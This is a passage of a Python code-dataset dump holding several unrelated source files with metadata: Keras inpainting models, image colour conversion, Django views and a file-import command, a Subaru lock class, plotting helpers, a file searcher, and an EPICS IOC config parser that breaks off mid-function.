w, s = l\n # changed same to valid\n net = tf.keras.layers.Conv2D(k, w, strides=s, padding=\"same\",\n activation=\"relu\")(net)\n net = tf.keras.layers.BatchNormalization()(net)\n return tf.keras.Model(inpt, net)\n \n\n\n \n\ndef build_encoder(num_channels=3):\n \"\"\"\n Inpainting encoder model from Pathak et al\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, num_channels))\n net = inpt\n #for k in [64, 64, 128, 256, 512]:\n for k in [32, 64, 128, 256, 512]:\n net = tf.keras.layers.Conv2D(k, 4, strides=2, padding=\"same\")(net)\n net = tf.keras.layers.LeakyReLU(alpha=0.2)(net)\n net = tf.keras.layers.BatchNormalization()(net)\n return tf.keras.Model(inpt, net, name=\"encoder\")\n\n\ndef build_decoder(input_channels=512, num_channels=3):\n \"\"\"\n Inpainting decoder from Pathak et al\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, input_channels))\n net = inpt\n\n #for k in [512, 256, 128, 64, 64]:\n for k in [512, 256, 128, 64, 32]:\n net = tf.keras.layers.Conv2DTranspose(k, 4, strides=2, \n padding=\"same\",\n activation=tf.keras.activations.relu)(net)\n net = tf.keras.layers.BatchNormalization()(net)\n \n net = tf.keras.layers.Conv2D(num_channels, 3, strides=1, padding=\"same\", \n activation=tf.keras.activations.sigmoid)(net)\n return tf.keras.Model(inpt, net, name=\"decoder\")\n\n\ndef build_discriminator(num_channels=3):\n \"\"\"\n Inpainting discriminator from Pathak et al\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, num_channels))\n net = inpt\n for k in [64, 128, 256, 512]:\n net = tf.keras.layers.Conv2D(k, 4, strides=2, padding=\"same\",\n activation=tf.keras.activations.relu)(net)\n net = tf.keras.layers.BatchNormalization()(net)\n net = tf.keras.layers.GlobalMaxPool2D()(net)\n net = tf.keras.layers.Dense(1, activation=tf.keras.activations.sigmoid,\n name=\"disc_pred\")(net)\n return tf.keras.Model(inpt, net, name=\"discriminator\")","sub_path":"patchwork/feature/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"209481567","text":"from PIL import Image\nfrom pylab import *\nimport numpy as np\nim = array(Image.open(\"./oriimage.jpg\"))\nr = im[:,:,0]\ng = im[:,:,1]\nb = im[:,:,2]\nr, g, b = r / 255.0, g / 255.0, b / 255.0\nr= np.matrix(r)\ng= np.matrix(g)\nb= np.matrix(b)\nY = 65.481*r+128.553*g+ 24.966*b+16\nCb = -37.797*r-74.203*g+112*b+128\nCr = 112*r-93.786*g-18.214*b+128\nimage1 = 
Image.fromarray(Y)\nimage1.show()\nimage2 = Image.fromarray(Cb)\nimage2.show()\nimage3 = Image.fromarray(Cr)\nimage3.show()\n","sub_path":"RGB-to-YCbCr.py","file_name":"RGB-to-YCbCr.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"533722987","text":"#!/usr/bin/env python\nfrom carddeck import CardDeck\n\nclass JokerDeck(CardDeck):\n\n def _make_deck(self):\n super()._make_deck() # call ancestor's method\n joker1 = 'J1', \"Joker\"\n joker2 = 'J2', 'Joker'\n self._cards.append(joker1)\n self._cards.append(joker2)\n\n\n","sub_path":"jokerdeck.py","file_name":"jokerdeck.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"150314817","text":"import datetime\nimport os\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom dbfiles.models import DBFile\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--clear\",\n action=\"store_true\",\n default=False,\n help=\"Clears out the db_file table before importing\",\n )\n parser.add_argument(\n \"--path\",\n default=settings.MEDIA_ROOT,\n help=\"The root directory to import into the db_file table\",\n )\n\n def handle(self, *args, **options):\n if options[\"clear\"]:\n DBFile.objects.all().delete()\n media_root = os.path.abspath(options[\"path\"])\n for root, dirs, files in os.walk(media_root):\n for f in files:\n if f.startswith(\".\"):\n continue\n file_path = os.path.join(root, f)\n rel_path = os.path.relpath(file_path, media_root)\n if DBFile.objects.filter(name=rel_path).exists():\n print('\"%s\" already exists in the database, skipping' % rel_path)\n continue\n mtime = os.path.getmtime(file_path)\n mod_time = timezone.make_aware(\n datetime.datetime.utcfromtimestamp(mtime), timezone.utc\n )\n with open(file_path, \"rb\") as f:\n print('Importing \"%s\"' % rel_path)\n DBFile.objects.create(\n content=f.read(),\n name=rel_path,\n created_on=mod_time,\n updated_on=mod_time,\n )\n","sub_path":"dbfiles/management/commands/dbfiles_import.py","file_name":"dbfiles_import.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"364442516","text":"from django.shortcuts import render\nfrom .models import ImagesLogo\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\n\n\n# Create your views here.\ndef main(request):\n img_obj = ImagesLogo.objects.all()\n p = Paginator(img_obj, 6)\n page = request.GET.get('page')\n try:\n get_img = p.page(page)\n except PageNotAnInteger:\n get_img = p.page(1)\n except EmptyPage:\n get_img = p.page(p.num_pages)\n\n return render(request, 'main.html', {'images': get_img})\n\n\ndef test_main(request):\n img_obj = ImagesLogo.objects.all()\n p = Paginator(img_obj, 6)\n page = request.GET.get('page')\n try:\n get_img = p.page(page)\n except PageNotAnInteger:\n get_img = p.page(1)\n except EmptyPage:\n get_img = p.page(p.num_pages)\n\n return render(request, 'testpage.html', {'images': get_img})\n\n\ndef form_view(request):\n errors = []\n form = {}\n if request.POST:\n form['name'] = request.POST.get('name')\n form['email'] = request.POST.get('email')\n form['message'] = request.POST.get('message')\n\n if not form['name']:\n errors.append('Please fill in your name')\n if '@' not in form['email']:\n errors.append('Please enter a valid email')\n if not form['message']:\n errors.append('Please enter a message')\n if not errors:\n print(form)\n return HttpResponse('Thank you for your message!')\n return render(request, 'forms.html', {'errors': errors, 'form': form})\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"423496356","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Volumes/data/proj/subarulink/subarulink/lock.py\n# Compiled at: 2020-03-30 09:00:20\n# Size of source mod 2**32: 1841 bytes\n\"\"\"\nPython Package for controlling Subaru API.\n\nFor more details about this api, please refer to the documentation at\nhttps://github.com/G-Two/subarulink\n\"\"\"\nfrom subarulink.vehicle import VehicleDevice\n\nclass Lock(VehicleDevice):\n __doc__ = 'Home-assistant lock class for Subaru vehicles.\\n\\n This is intended to be partially inherited by a Home-Assistant entity.\\n '\n\n def __init__(self, data, controller):\n super().__init__(data, controller)\n self._Lock__manual_update_time = 0\n self._Lock__lock_state = False\n self.type = 'door lock'\n self.hass_type = 'lock'\n self.name = self._name()\n self.uniq_name = self._uniq_name()\n self.bin_type = 7\n\n async def lock(self):\n \"\"\"Send lock command.\"\"\"\n data = await self._controller.lock(self._vin)\n if data:\n if data['data']['success']:\n self._Lock__lock_state = True\n\n async def unlock(self):\n \"\"\"Send unlock command.\"\"\"\n data = await self._controller.unlock(self._vin)\n if data:\n if data['data']['success']:\n self._Lock__lock_state = False\n\n def is_locked(self):\n \"\"\"Return whether doors are locked.\n\n Subaru API does not report lock status. This state cannot be depended on.\n \"\"\"\n return self._Lock__lock_state\n\n @staticmethod\n def has_battery():\n \"\"\"Return whether the device has a battery.\"\"\"\n return False","sub_path":"pycfiles/subarulink-0.1.0-py3-none-any/lock.cpython-37.py","file_name":"lock.cpython-37.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"114956901","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom . import forms\nfrom credentials import models as cre_models\nimport os\n# Create your views here.\n\ndef sendEmail(request, receiver):\n\n\n\tlink = cre_models.Resume.objects.get(id__exact=1).link\n\temail_id = cre_models.Resume.objects.get(id__exact=1).email_id\n\ttext = \"This is my resume link\\n\" + str(link)\n\tmy_text = \"Your link has been shared with \" + str(receiver)\n\tsend_mail(\"Resume Link\",text,'EMAIL_HOST_USER',[receiver],fail_silently = False)\n\tsend_mail(\"Resume Viewed\",my_text,'EMAIL_HOST_USER',[email_id],fail_silently = False)\n\n\n# \tjump_url = f'https://harshdeepsingh.herokuapp.com/send/{receiver}/'\n# \trequests.get(jump_url)\n\n\treturn redirect('credentials:index')\n\ndef getReceiver(request):\n\tif request.method == 'POST':\n\t\tform = forms.ReceiverForm(request.POST)\n\t\tif form.is_valid():\n\t\t\temail_id = form.cleaned_data['email_id']\n\t\t\treturn redirect('emails:send', receiver=email_id)\n\t\telse:\n\t\t\treturn HttpResponse(\"Oops! Something went wrong. 
Please try again\")\n\telse:\n\t\tform = forms.ReceiverForm()\n\t\treturn render(request, 'index.html', {'form':form})","sub_path":"emails/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"138424960","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nA module that contains general types that can be subclassed to create new plot types.\n\"\"\"\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom src.input_file import input_file_types as inp_types\n\n\t\ndef plot_xyz_data(ats, a=False, args={}):\n\t\"\"\"\n\tA general function to plot atomic coord data.\n\n\tInputs:\n\t\t* ats => (natom, 3)\n\t\"\"\"\n\tdefault_args = {'ls': 'None', 'marker': '.'}\n\tfor i in args: default_args[i] = args[i]\n\n\tif a is False:\n\t\tf = plt.figure()\n\t\ta = f.add_subplot(111, projection=\"3d\")\n\n\t\ta.set_xlabel(\"X\")\n\t\ta.set_ylabel(\"Y\")\n\t\ta.set_zlabel(\"Z\")\n\n\t\ta.view_init(elev=-3, azim=64)\n\n\t\ta.set_xticks([])\n\t\ta.set_yticks([])\n\t\ta.set_zticks([])\n\n\ta.plot(ats[:, 0], ats[:, 1], ats[:, 2], **default_args)\n\n\treturn a\n\nclass Plot_Type(object):\n\t\"\"\"\n\tA type containing some useful functions that can be inheritted when creating a new calc type.\n\n\tInputs:\n\t\t* Variable => An instance of the Variable class.\n\n\tPublic Methods:\n\t\t* calc => To be overridden to calculate the property in question.\n\t\"\"\"\n\trequired_metadata = ()\n\trequired_var_attributes = ()\n\n\tname = \"General Plot Type\"\n\n\tdef __init__(self, Variable):\n\t\t\"\"\"\n\t\tJust check we have the required properties for calculating the quantitiy.\n\t\t\"\"\"\n\t\tself.Var = Variable\n\n\t\t# Copy all data to make it unique for each instance\n\t\tall_vars = [i for i in dir(self) if i[0] != '_']\n\t\tfor i in all_vars:\n\t\t\tif i[0] != '_':\n\t\t\t\tvar = getattr(self, i)\n\t\t\t\tif not callable(var) and isinstance(var, (dict, list, tuple)):\n\t\t\t\t\tsetattr(self, i, copy.deepcopy(var))\n\n\t\t# Set the default parameters\n\t\tfor key in self._defaults:\n\t\t\tif key not in self.Var.metadata:\n\t\t\t\tself.Var.metadata[key] = self._defaults[key]\n\n\t\t\tself.metadata[key] = self.Var.metadata[key]\n\n\t\t# Check we have all the data we need to calculate the property\n\t\tfor key in self.required_metadata:\n\t\t\tif key not in self.Var.metadata:\n\t\t\t raise KeyError(f\"Please load the data '{key}' into the variable '{self.Var.name}'\")\n\t\t\telse:\n\t\t\t self.metadata[key] = self.Var[key]\n\n\t\t# Check the input variable has the required attributes\n\t\tfor attr in self.required_var_attributes:\n\t\t\tif not hasattr(self.Var, attr):\n\t\t\t\tif hasattr(self.Var, \"data\"):\n\t\t\t\t\tif type(self.Var.data) == inp_types.Vars:\n\t\t\t\t\t\tfound = False\n\t\t\t\t\t\tfor key in self.Var.data:\n\t\t\t\t\t\t\tif hasattr(self.Var.data[key], attr):\n\t\t\t\t\t\t\t\tsetattr(self.Var, attr, getattr(self.Var.data[key], attr))\n\t\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tif found: continue\n\n\n\t\t\t\t\telif hasattr(self.Var.data, attr):\n\t\t\t\t\t\tsetattr(self.Var, attr, getattr(self.Var.data, attr))\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tall_attrs = [i for i in dir(self.Var) if i[:2] != \"__\"]\n\t\t\t\t\tmsg = f\"Can't plot '{self.name}' from the variable '{self.Var.name}'\\n\\n\"\n\t\t\t\t\tmsg += f\"{Variable.name} doesn't have the attribute '{attr}'\" + \"\\n\"\n\t\t\t\t\tmsg += \"\\nAll Attributes\\n\\t* \" + 
\"\\n\\t* \".join(all_attrs)\n\t\t\t\t\traise SystemError(\"\\n\\n\" + msg)\n\n\t\tself._plot_()\n\n\tdef _plot_(self):\n\t\t\"\"\"A function to be overriden\"\"\"\n\t\tprint(f\"Please override the plot func in {self.name}\")\n\n\tdef _plot_xyz_data(self, ats, a=False, args={'ls': 'None', 'marker': '.'}):\n\t\tif a is False:\n\t\t\tf = plt.figure()\n\t\t\ta = f.add_subplot(111, projection=\"3d\")\n\n\t\t\ta.set_xlabel(\"X\")\n\t\t\ta.set_ylabel(\"Y\")\n\t\t\ta.set_zlabel(\"Z\")\n\n\t\t\ta.view_init(elev=-3, azim=64)\n\n\t\t\ta.set_xticks([])\n\t\t\ta.set_yticks([])\n\t\t\ta.set_zticks([])\n\n\t\ta.plot(ats[:, 0], ats[:, 1], ats[:, 2], **args)\n\n\t\treturn a\n\n\tdef _rotate_plot_(self, ax, elev_increment=False, azim_increment=1, init_elev=30, init_azim=0, step_func=False, args=()):\n\t\t\"\"\"\n\t\tWill rotate a 3D plot.\n\n\t\tInputs:\n\t\t\t* ax => The axis to rotate\n\t\t\t* elev_increment => The value to increment the elevation axis by\n\t\t\t* azim_increment => The value to increment the azimuthal axis by\n\t\t\t* init_elev => The initial elevation of the axis\n\t\t\t* init_azim => The initial azimuth angle of the axis\n\t\t\t* step_func => A function to carry out at each step\n\t\t\"\"\"\n\t\tcount = 0\n\t\tif elev_increment and azim_increment:\n\t\t\tfor elev_ang in np.arange(init_elev, 360 + init_elev, elev_increment):\n\t\t\t\tfor azim_ang in np.arange(init_azim, 360 + init_azim, azim_increment):\n\t\t\t\t\tcount += 1\n\t\t\t\t\tax.view_init(azim=azim_ang, elev=elev_ang)\n\t\t\t\t\tif step_func:\n\t\t\t\t\t\tstep_func(count, *args)\n\n\t\telif elev_increment and not azim_increment:\n\t\t\tfor elev_ang in np.arange(init_elev, 360 + init_elev, elev_increment):\n\t\t\t\tcount += 1\n\t\t\t\tax.view_init(azim=init_azim, elev=elev_ang)\n\t\t\t\tif step_func:\n\t\t\t\t\tstep_func(count, *args)\n\n\t\telif azim_increment and not elev_increment:\n\t\t\tfor azim_ang in np.arange(init_azim, 360 + init_azim, azim_increment):\n\t\t\t\tcount += 1\n\t\t\t\tax.view_init(azim=azim_ang, elev=init_elev)\n\t\t\t\tif step_func:\n\t\t\t\t\tstep_func(count, *args)","sub_path":"src/plot/general_plot.py","file_name":"general_plot.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"506185571","text":"__author__ = 'Nick'\n\n# coding=UTF-8\n\n# Houqi Zuo\n# Homework#04 -- Python\nimport os\nfrom datetime import datetime\n\ndef search( data_list ):\n\t# get input from user\n\tquery= input(\"query:\")\n\t# split the string\n\tquery = query.split()\n\t# delete the duplicated element\n\tsearch=set(query)\n\t# delete \"and\" and \"or\"\n\t# when boolOperator is 1. perform \"and\" operator\n\t# when boolOperator is 0. 
perform \"or\" operator\n\tboolOperator = 1\n\tif ( \"and\" in search ):\n\t\tsearch.remove(\"and\")\n\tif ( \"or\" in search ):\n\t\tsearch.remove(\"or\")\n\t\tboolOperator = 0\n\t# print\n\tif (boolOperator):\n\t\tprint(\"Performing AND search for:\", search )\n\telse:\n\t\tprint(\"Performing OR search for:\", search )\n\n\tmydict = { word:None for word in search }\n\n\t# get current time\n\tdt1 = datetime.now()\n\tprint( \"The time before search ; \", dt1)\n\t#start_time = time.monotonic()*10000\n\n\t'''\n\t# This codes use pickle technique\n\t# perform search\n\t# AND perform\n\tif (boolOperator):\n\t\t# search\n\t\tfor tuple_in_list in data_list:\n\t\t\t#print(type(tuple_in_list))\n\t\t\tmydict = { x:None for x in mydict.keys() }\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif( key in tuple_in_list[1] ):\n\t\t\t\t\tmydict[key] = 1\n\t\t\t# output\n\t\t\tif ( None not in mydict.values() ):\n\t\t\t\t# get current time\n\t\t\t\tprint(\"Found at:\", tuple_in_list[0] )\n\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( tuple_in_list[0] ) )\n\t\t\t\tprint(\"The size of file is: \", os.path.getsize( tuple_in_list[0] ) )\n\t\t\t\tbreak\n\t# OR perform\n\telse:\n\t\t# search one line by one line\n\t\tfor tuple_in_list in data_list:\n\t\t\t# search\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif ( key in tuple_in_list[1] ):\n\t\t\t\t\t# get current time\n\t\t\t\t\tprint(\"Found at:\" ,tuple_in_list[0])\n\t\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( tuple_in_list[0] ) )\n\t\t\t\t\tprint(\"The size of file is: \", os.path.getsize( tuple_in_list[0] ) )\n\t\t\t\t\tbreak\n\t'''\n\t# This codes use shelve technique\n\t# perform search\n\t# AND perform\n\tif (boolOperator):\n\t\t# search\n\t\tfor i,dict_shelve in data_list.items():\n\t\t\t#print(type(tuple_in_list))\n\t\t\tword = dict_shelve.split()\n\t\t\tmydict = { x:None for x in mydict.keys() }\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif( key in word ):\n\t\t\t\t\tmydict[key] = 1\n\t\t\t# output\n\t\t\tif ( None not in mydict.values() ):\n\t\t\t\t# get current time\n\t\t\t\tprint(\"Found at:\", i )\n\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( i ) )\n\t\t\t\tprint(\"The size of file is: \", os.path.getsize( i ) )\n\t# OR perform\n\telse:\n\t\t# search one line by one line\n\t\tfor i,dict_shelve in data_list.items():\n\t\t\tword = dict_shelve.split()\n\t\t\t# search\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif ( key in word ):\n\t\t\t\t\tprint(\"Found at:\" ,i)\n\t\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( i ) )\n\t\t\t\t\tprint(\"The size of file is: \", os.path.getsize( i ) )\n\t\t\t\t\tbreak\n\t#end_time = time.monotonic() *10000.\n\tdt2 = datetime.now()\n\tprint( \"The time after search : \", dt2)\n\tprint( \"Execution time: %d ms\" % (dt2.microsecond - dt1.microsecond) )","sub_path":"HW#04/FileTraversal/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"318048125","text":"#!/usr/bin/env python\n#\n# A bizarre combination of code from IocManager, the parent/child IOC compilation process, and\n# ParameterManager.\n#\nimport fcntl, re, sys, ast, os, operator\nfrom io import StringIO\n\nfrom psp.options import Options\nfrom psp.Pv import Pv\nimport pyca\n\nfrom .pmgrobj import pmgrobj\n\n\nCONFIG_FILE = \"/reg/g/pcds/pyps/config/%s/iocmanager.cfg\"\nEPICS_TOP = \"/reg/g/pcds/package/epics/\"\nEPICS_SITE_TOP = \"/reg/g/pcds/package/epics/3.14/\"\n\nhutch = 
None\nfldlist = { 'FLD_HLM',\n 'FLD_HOMD',\n 'FLD_LLM',\n 'FLD_OFF',\n 'FLD_DESC' };\n\ndef caget(pvname,timeout=30.0):\n try:\n pv = Pv(pvname)\n pv.connect(timeout)\n pv.get(ctrl=False, timeout=timeout)\n v = pv.value\n pv.disconnect()\n return v\n except pyca.pyexc as e:\n print('pyca exception: %s' %(e))\n return None\n except pyca.caexc as e:\n print('channel access exception: %s' %(e))\n return None\n\ndef readConfig():\n config = {'procmgr_config': None, 'hosts': None, 'dir':'dir',\n 'id':'id', 'cmd':'cmd', 'flags':'flags', 'port':'port', 'host':'host',\n 'disable':'disable', 'history':'history', 'delay':'delay', 'alias':'alias' }\n vars = set(config.keys())\n cfgfn = CONFIG_FILE % hutch\n f = open(cfgfn, \"r\")\n fcntl.lockf(f, fcntl.LOCK_SH) # Wait for the lock!!!!\n try:\n execfile(cfgfn, {}, config)\n res = config['procmgr_config']\n except:\n res = None\n fcntl.lockf(f, fcntl.LOCK_UN)\n f.close()\n if res == None:\n return None\n d = []\n for l in res:\n if 'disable' in l.keys() and l['disable']:\n continue\n name = l['id']\n dir = l['dir']\n if re.search(\"/ims/\", dir) or re.search(\"/ims$\", dir):\n if dir[0:3] == \"../\":\n dir = EPICS_TOP + dir[3:]\n elif dir[0] != '/':\n dir = EPICS_SITE_TOP + dir\n d.append((name, dir))\n return d\n\nclass config():\n def __init__(self):\n self.path = os.getcwd()\n self.dirname = self.path.split('/')[-1]\n self.ddict = {}\n self.idict = {}\n\n # Pre-define some regular expressions!\n self.doubledollar = re.compile(\"^(.*?)\\$\\$\")\n self.keyword = re.compile(\"^(UP|LOOP|IF|INCLUDE|TRANSLATE|COUNT)\\(|^(CALC)\\{\")\n self.parens = re.compile(\"^\\(([^)]*?)\\)\")\n self.brackets = re.compile(\"^\\{([^}]*?)\\}\")\n self.trargs = re.compile('^\\(([^,]*?),\"([^\"]*?)\",\"([^\"]*?)\"\\)')\n self.ifargs = re.compile('^\\(([^,)]*?),([^,)]*?),([^,)]*?)\\)')\n self.word = re.compile(\"^([A-Za-z0-9_]*)\")\n self.operators = {ast.Add: operator.add,\n ast.Sub: operator.sub,\n ast.Mult: operator.mul,\n ast.Div: operator.truediv,\n ast.Pow: operator.pow,\n ast.LShift : operator.lshift,\n ast.RShift: operator.rshift,\n ast.BitOr: operator.or_,\n ast.BitAnd : operator.and_,\n ast.BitXor: operator.xor}\n\n def create_instance(self, iname, id, idict, ndict):\n try:\n allinst = idict[iname]\n except:\n allinst = []\n idict[iname] = []\n n = str(len(allinst))\n if id != None:\n ndict[id] = (iname, int(n))\n dd = {}\n dd[\"INDEX\"] = n\n return (dd, n)\n\n def finish_instance(self, iname, idict, dd):\n idict[iname].append(dd)\n\n def read_config(self, file, extra):\n w = re.compile(\"^[ \\t]*([^ \\t=]+)\")\n wq = re.compile('^[ \\t]*\"([^\"]*)\"')\n wqq = re.compile(\"^[ \\t]*'([^']*)'\")\n assign = re.compile(\"^[ \\t]*=\")\n sp = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]+(.+?)[ \\t]*$\")\n spq = re.compile('^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]+\"([^\"]*)\"[ \\t]*$')\n spqq = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]+'([^']*)'[ \\t]*$\")\n eq = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]*=[ \\t]*(.*?)[ \\t]*$\")\n eqq = re.compile('^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]*=[ \\t]*\"([^\"]*)\"[ \\t]*$')\n eqqq = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]*=[ \\t]*'([^']*)'[ \\t]*$\")\n inst = re.compile(\"^[ \\t]*(([A-Za-z_][A-Za-z0-9_]*):[ \\t]*)?([A-Za-z_][A-Za-z0-9_]*)\\((.*)\\)[ \\t]*$\")\n inst2 = re.compile(\"^[ \\t]*INSTANCE[ \\t]+([A-Za-z_][A-Za-z0-9_]*)[ \\t]*([A-Za-z0-9_]*)[ \\t]*$\")\n\n prminst = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*)(,)\")\n prmidx = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*?)([0-9_]+)(,)\")\n 
prmeq = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*)=([^,]*)(,)\")\n prmeqq = re.compile('^([A-Za-z_][A-Za-z0-9_]*)=\"([^\"]*)\"(,)')\n prmeqqq = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*)='([^']*)'(,)\")\n\n fp = open(file)\n if not fp:\n raise IOError(\"File %s not found!\" % ( file ))\n lines = [l + \"\\n\" for l in extra] + fp.readlines()\n fp.close()\n origlines = lines\n\n # Do the preliminary config expansion!\n output = StringIO.StringIO()\n expand(self, lines, output)\n value = output.getvalue()\n output.close()\n lines = value.split(\"\\n\")\n\n d = {\"DIRNAME\": self.dirname, \"PATH\" : self.path}\n for l in lines:\n l = l.strip()\n m = inst.search(l)\n if m != None:\n continue # Skip instantiations for now!\n m = inst2.search(l)\n if m != None: # First new-style instantiation --> we're done here!\n break\n # Search for a one-line assignment of some form!\n m = eqqq.search(l)\n if m == None:\n m = eqq.search(l)\n if m == None:\n m = eq.search(l)\n if m == None:\n m = spqq.search(l)\n if m == None:\n m = spq.search(l)\n if m == None:\n m = sp.search(l)\n if m != None:\n var = m.group(1)\n val = m.group(2)\n d[var] = val;\n continue\n if l != \"\" and l[0] != '#':\n print(\"Skipping unknown line: %s\" % l)\n self.ddict = d\n\n # Now that we have the aliases, reprocess the config!\n \n lines = origlines\n output = StringIO.StringIO()\n expand(self, lines, output)\n value = output.getvalue()\n output.close()\n lines = value.split(\"\\n\")\n \n i = {}\n d = {\"DIRNAME\": self.dirname, \"PATH\": self.path}\n nd = {}\n newstyle = False\n ininst = False\n \n for l in lines:\n l = l.strip()\n m = inst2.search(l)\n if m != None:\n newstyle = True\n if newstyle:\n if m != None:\n if ininst:\n self.finish_instance(iname, i, dd)\n ininst = True\n iname = m.group(1)\n id = m.group(2)\n dd, n = self.create_instance(iname, id, i, nd)\n else:\n loc = 0 # Look for parameters!\n first = None\n haveeq = False\n while l[loc:] != '':\n m = assign.search(l[loc:])\n if m != None:\n loc += m.end()\n if haveeq:\n print(\"Double equal sign in |%s|\" % l)\n haveeq = True\n continue # Just ignore it!\n\n m = wqq.search(l[loc:])\n if m != None:\n loc += m.end()\n else:\n m = wq.search(l[loc:])\n if m != None:\n loc += m.end() + 1\n else:\n m = w.search(l[loc:])\n if m != None:\n loc += m.end() + 1\n else:\n break # How does this even happen?!?\n val = m.group(1)\n if first != None:\n dd[first] = val\n d[iname + first + n] = val\n first = None\n else:\n # Could this be an instance parameter?\n useinst = ''\n usenum = 0\n try:\n t = nd[val]\n useinst = t[0]\n usenum = t[1]\n except:\n m = prmidx.search(val+\",\")\n if m != None:\n useinst = m.group(1)\n usenum = int(m.group(2))\n try:\n used = i[useinst][usenum]\n for k in used.keys():\n var = useinst + k\n val = used[k]\n dd[var] = val\n except:\n first = val\n haveeq = False\n continue\n m = inst.search(l)\n if m != None:\n id = m.group(2)\n iname = m.group(3)\n params = m.group(4) + \",\"\n dd, n = self.create_instance(iname, id, i, nd)\n while (params != \"\"):\n m = prmeqqq.search(params)\n if m == None:\n m = prmeqq.search(params)\n if m == None:\n m = prmeq.search(params)\n if m != None:\n # Parameter of the form VAR=VAL. Global dictionary will also\n # get inameVARn=VAL.\n var = m.group(1)\n val = m.group(2)\n dd[var] = val\n d[iname + var + n] = val\n params = params[m.end(3):len(params)]\n else:\n m = prminst.search(params)\n if m != None:\n # This is an instance parameter. It is either old-style,\n # INSTn, or an arbitrary name. 
Check the name dict first!\n try:\n t = nd[m.group(1)]\n useinst = t[0]\n usenum = t[1]\n params = params[m.end(2):len(params)]\n except:\n m = prmidx.search(params)\n if m == None:\n print(\"Unknown parameter in line %s\" % params)\n params = \"\"\n continue\n useinst = m.group(1)\n usenum = int(m.group(2))\n params = params[m.end(3):len(params)]\n # Find the instance, and add all of its named parameters\n # VAL with the name INSTVAL.\n used = i[useinst][usenum]\n for k in used.keys():\n var = useinst + k\n val = used[k]\n dd[var] = val\n else:\n print(\"Unknown parameter in line %s\" % params)\n params = \"\"\n self.finish_instance(iname, i, dd)\n continue\n # Search for a one-line assignment of some form!\n m = eqqq.search(l)\n if m == None:\n m = eqq.search(l)\n if m == None:\n m = eq.search(l)\n if m == None:\n m = spqq.search(l)\n if m == None:\n m = spq.search(l)\n if m == None:\n m = sp.search(l)\n if m != None:\n var = m.group(1)\n val = m.group(2)\n d[var] = val;\n continue\n if l != \"\" and l[0] != '#':\n print(\"Skipping unknown line: %s\" % l)\n if ininst:\n self.finish_instance(iname, i, dd)\n self.idict = i\n self.ddict = d\n\n def eval_expr(self, expr):\n return self.eval_(ast.parse(expr).body[0].value) # Module(body=[Expr(value=...)])\n\n def eval_(self, node):\n if isinstance(node, ast.Num):\n return node.n\n elif isinstance(node, ast.Name):\n try:\n x = int(self.ddict[node.id])\n except:\n x = 0\n return x\n elif isinstance(node, ast.operator):\n return self.operators[type(node)]\n elif isinstance(node, ast.BinOp):\n return self.eval_(node.op)(self.eval_(node.left), self.eval_(node.right))\n else:\n raise TypeError(node)\n\n\ndef expand(cfg, lines, f):\n i = 0\n loc = 0\n while i < len(lines):\n m = cfg.doubledollar.search(lines[i][loc:])\n if m == None:\n # Line without a $$.\n f.write(\"%s\" % lines[i][loc:])\n i += 1\n loc = 0\n continue\n\n # Write the first part\n f.write(m.group(1))\n pos = loc + m.end(1) # save where we found this!\n loc = pos + 2 # skip the 